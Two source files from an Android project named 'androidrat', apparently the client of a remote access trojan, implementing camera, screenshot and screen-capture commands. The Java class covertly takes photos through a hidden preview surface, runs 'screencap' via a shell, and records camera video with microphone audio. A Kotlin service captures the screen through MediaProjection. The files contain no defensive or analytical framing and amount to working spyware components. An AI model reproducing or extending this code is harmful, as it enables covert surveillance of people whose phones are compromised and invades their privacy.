File: client/app/src/main/java/com/nqmgaming/androidrat/command/Screenshot.java
package com.nqmgaming.androidrat.command;

import android.app.Activity;
import android.content.Context;
import android.graphics.Bitmap;
import android.graphics.BitmapFactory;
import android.graphics.PixelFormat;
import android.graphics.SurfaceTexture;
import android.hardware.Camera;
import android.hardware.display.DisplayManager;
import android.media.Image;
import android.media.ImageReader;
import android.media.MediaRecorder;
import android.media.projection.MediaProjection;
import android.os.Environment;
import android.util.DisplayMetrics;
import android.util.Log;
import android.view.Surface;

import java.io.File;
import java.io.FileOutputStream;
import java.io.IOException;
import java.nio.ByteBuffer;

public class Screenshot {

    private static MediaProjection mediaProjection;
    private static ImageReader imageReader;

    private static boolean isRecording = false;

    private static MediaRecorder mediaRecorder;
    private static SurfaceTexture surfaceTexture;
    private static Surface surface;


    private static Camera camera;


    /**
     *
     * @return
     */
    public static String captureImage(Context context, boolean frontCamera) {
        String filename =  Environment.getExternalStoragePublicDirectory(Environment.DIRECTORY_PICTURES).toString() + "/"+ String.valueOf(System.currentTimeMillis()).replaceAll(":", ".") + ".png";
        camera = getCamera(frontCamera);
        Camera.Parameters parameters = camera.getParameters();
        camera.setParameters(parameters);
        try{
            camera.setPreviewTexture(new SurfaceTexture(0));
            camera.startPreview();
        } catch (Exception e) {
            e.printStackTrace();
        }

        camera.takePicture(null, null, new Camera.PictureCallback() {
            @Override
            public void onPictureTaken(byte[] data, Camera camera) {
                releaseCamera();
                try{
                    Bitmap bitmap = BitmapFactory.decodeByteArray(data, 0, data.length);
                    FileOutputStream output = new FileOutputStream(filename);
                    bitmap.compress(Bitmap.CompressFormat.PNG, 20, output);

                    output.flush();
                    output.close();
                }catch(Exception ex){
                }
            }
        });

        return filename;
    }

    /**
     * Camera cleanup
     */
    private static void releaseCamera(){
        if (camera != null) {
            camera.stopPreview();
            camera.release();
            camera = null;
        }
    }

    /**
     * Take screenshot of device
     * @return
     */
    public static String captureScreen() {
        try {
            String filename =  Environment.getExternalStoragePublicDirectory(Environment.DIRECTORY_PICTURES).toString() + "/"+ String.valueOf(System.currentTimeMillis()).replaceAll(":", ".") + ".png";
            Process process = Runtime.getRuntime().exec("screencap " + filename);
            process.waitFor();
            Thread.sleep(3000);

            if (process.exitValue() == 0)
                return filename;
        } catch (Exception exception) {
            Log.e("eeee", exception.toString());
        }

        return null;
//        if (mediaProjectionManager != null)
//            activity.startActivityForResult(mediaProjectionManager.createScreenCaptureIntent(), REQUEST_CODE_SCREEN_CAPTURE);

    }

    public static String takeScreenshot(MediaProjection mProjection, Activity activity) {
        String filename =  Environment.getExternalStoragePublicDirectory(Environment.DIRECTORY_PICTURES).toString() + "/"+ String.valueOf(System.currentTimeMillis()).replaceAll(":", ".") + ".png";

        DisplayMetrics metrics = activity.getResources().getDisplayMetrics();
        int width = metrics.widthPixels;
        int height = metrics.heightPixels;
        ImageReader mImageReader = ImageReader.newInstance(width, height, PixelFormat.RGBA_8888, 2);
        mProjection.createVirtualDisplay("ScreenCapture",
                width, height, metrics.densityDpi,
                DisplayManager.VIRTUAL_DISPLAY_FLAG_AUTO_MIRROR,
                mImageReader.getSurface(), null, null);

        Image image = mImageReader.acquireLatestImage();
        if (image != null) {
            ByteBuffer buffer = image.getPlanes()[0].getBuffer();
            byte[] bytes = new byte[buffer.remaining()];
            buffer.get(bytes);
            FileOutputStream fos = null;
            try {
                File file = new File(filename); // Change to your desired file location
                fos = new FileOutputStream(file);
                fos.write(bytes);
            } catch (IOException e) {
                e.printStackTrace();
            } finally {
                if (fos != null) {
                    try {
                        fos.close();
                    } catch (IOException e) {
                        e.printStackTrace();
                    }
                }
            }
            image.close();
        }
        return filename;
    }

    /**
     *
     * @param duration
     * @return
     */
    public static String captureVideo(boolean frontCamera, int duration) throws IOException, InterruptedException {
        File outputDir = Environment.getExternalStoragePublicDirectory(Environment.DIRECTORY_MOVIES);
        File videoFile = File.createTempFile(String.valueOf(System.currentTimeMillis()), ".mp4", outputDir);

        if (!isRecording) {
            startRecording(frontCamera, videoFile.getAbsolutePath());

            // Stop recording after duration
            Thread.sleep(duration * 1000L);
            stopRecording();
        }

        return videoFile.getAbsolutePath();
    }

    private static void startRecording(boolean frontCamera, String filePath) throws IOException {
        surfaceTexture = new SurfaceTexture(0);
        surface = new Surface(surfaceTexture);

        Camera camera = frontCamera ? Camera.open(Camera.CameraInfo.CAMERA_FACING_FRONT) : Camera.open(Camera.CameraInfo.CAMERA_FACING_BACK);
        camera.unlock();
        mediaRecorder = new MediaRecorder();
        mediaRecorder.setCamera(camera);
        mediaRecorder.setPreviewDisplay(surface);
        mediaRecorder.setVideoSource(MediaRecorder.VideoSource.CAMERA);
        mediaRecorder.setAudioSource(MediaRecorder.AudioSource.CAMCORDER);
        mediaRecorder.setOutputFormat(MediaRecorder.OutputFormat.MPEG_4);
        mediaRecorder.setOutputFile(filePath);
        mediaRecorder.setVideoEncoder(MediaRecorder.VideoEncoder.MPEG_4_SP);
        mediaRecorder.setAudioEncoder(MediaRecorder.AudioEncoder.DEFAULT);
        mediaRecorder.setVideoFrameRate(30); // 30 fps
        mediaRecorder.setVideoSize(1280, 720); // 720p

        // Prepare and start recording
        try {
            mediaRecorder.prepare();
            mediaRecorder.start();
            isRecording = true;
        } catch (Exception e) {
            Log.e("eeee", e.toString());
        }
    }

    private static void stopRecording() {
        if (isRecording) {
            mediaRecorder.stop();
            mediaRecorder.release();
            mediaRecorder = null;
            isRecording = false;

            surfaceTexture = null;
            surface = null;
        }
    }


    /**
     * Select the camera to use
     * @param frontCamera
     * @return selected camera object
     */
    public static Camera getCamera(boolean frontCamera) {
        int numberOfCameras = Camera.getNumberOfCameras();

        // Search for selected camera
        for (int i = 0; i < numberOfCameras; i++) {
            Camera.CameraInfo info = new Camera.CameraInfo();
            Camera.getCameraInfo(i, info);
            if (info.facing == Camera.CameraInfo.CAMERA_FACING_FRONT && frontCamera)
                return Camera.open(i);
            else if (info.facing == Camera.CameraInfo.CAMERA_FACING_BACK && !frontCamera)
                return Camera.open(i);
        }

        return Camera.open(0);
    }
}

File: client/app/src/main/java/com/nqmgaming/androidrat/service/Screenshot.kt
package com.nqmgaming.androidrat.service

import android.app.Activity
import android.app.Service
import android.content.Context
import android.content.Intent
import android.graphics.Bitmap
import android.graphics.PixelFormat
import android.hardware.display.DisplayManager
import android.hardware.display.VirtualDisplay
import android.media.ImageReader
import android.media.projection.MediaProjection
import android.media.projection.MediaProjectionManager
import android.os.Environment
import android.os.IBinder
import android.util.DisplayMetrics
import android.view.WindowManager
import java.io.File
import java.io.FileOutputStream
import java.io.IOException
import java.text.SimpleDateFormat
import java.util.Date
import java.util.Locale

class ScreenshotService : Service() {

    private lateinit var mediaProjection: MediaProjection
    private lateinit var virtualDisplay: VirtualDisplay
    private lateinit var imageReader: ImageReader
    private var displayWidth: Int = 0
    private var displayHeight: Int = 0
    private var displayDensity: Int = 0

    override fun onCreate() {
        super.onCreate()
        val metrics = DisplayMetrics()
        val windowManager = getSystemService(Context.WINDOW_SERVICE) as WindowManager
        windowManager.defaultDisplay.getMetrics(metrics)
        displayWidth = metrics.widthPixels
        displayHeight = metrics.heightPixels
        displayDensity = metrics.densityDpi
    }

    override fun onStartCommand(intent: Intent?, flags: Int, startId: Int): Int {
        val action = intent?.action
        if (action == "START_SCREENSHOT") {
            val data = intent.getParcelableExtra<Intent>("PROJECTION_DATA")
            if (data != null) {
                startProjection(data)
            }
        }
        return START_NOT_STICKY
    }

    private fun startProjection(data: Intent) {
        val mediaProjectionManager = getSystemService(Context.MEDIA_PROJECTION_SERVICE) as MediaProjectionManager
        mediaProjection = mediaProjectionManager.getMediaProjection(Activity.RESULT_OK, data)
        imageReader = ImageReader.newInstance(displayWidth, displayHeight, PixelFormat.RGBA_8888, 2)
        virtualDisplay = mediaProjection.createVirtualDisplay(
            "Screenshot",
            displayWidth,
            displayHeight,
            displayDensity,
            DisplayManager.VIRTUAL_DISPLAY_FLAG_AUTO_MIRROR,
            imageReader.surface,
            null,
            null
        )
        imageReader.setOnImageAvailableListener({ reader ->
            val image = reader.acquireLatestImage()
            if (image != null) {
                val planes = image.planes
                val buffer = planes[0].buffer
                val pixelStride = planes[0].pixelStride
                val rowStride = planes[0].rowStride
                val rowPadding = rowStride - pixelStride * displayWidth

                val bitmap = Bitmap.createBitmap(
                    displayWidth + rowPadding / pixelStride,
                    displayHeight,
                    Bitmap.Config.ARGB_8888
                )
                bitmap.copyPixelsFromBuffer(buffer)
                saveBitmap(bitmap)
                image.close()
            }
        }, null)
    }

    private fun saveBitmap(bitmap: Bitmap) {
        val fileName = SimpleDateFormat("yyyyMMdd_HHmmss", Locale.US).format(Date()) + ".png"
        val file = File(getExternalFilesDir(Environment.DIRECTORY_PICTURES), fileName)
        var fos: FileOutputStream? = null
        try {
            fos = FileOutputStream(file)
            bitmap.compress(Bitmap.CompressFormat.PNG, 100, fos)
        } catch (e: IOException) {
            e.printStackTrace()
        } finally {
            try {
                fos?.close()
            } catch (e: IOException) {
                e.printStackTrace()
            }
        }
    }

    override fun onBind(intent: Intent?): IBinder? {
        return null
    }

    override fun onDestroy() {
        super.onDestroy()
        virtualDisplay.release()
        imageReader.close()
        mediaProjection.stop()
    }
}
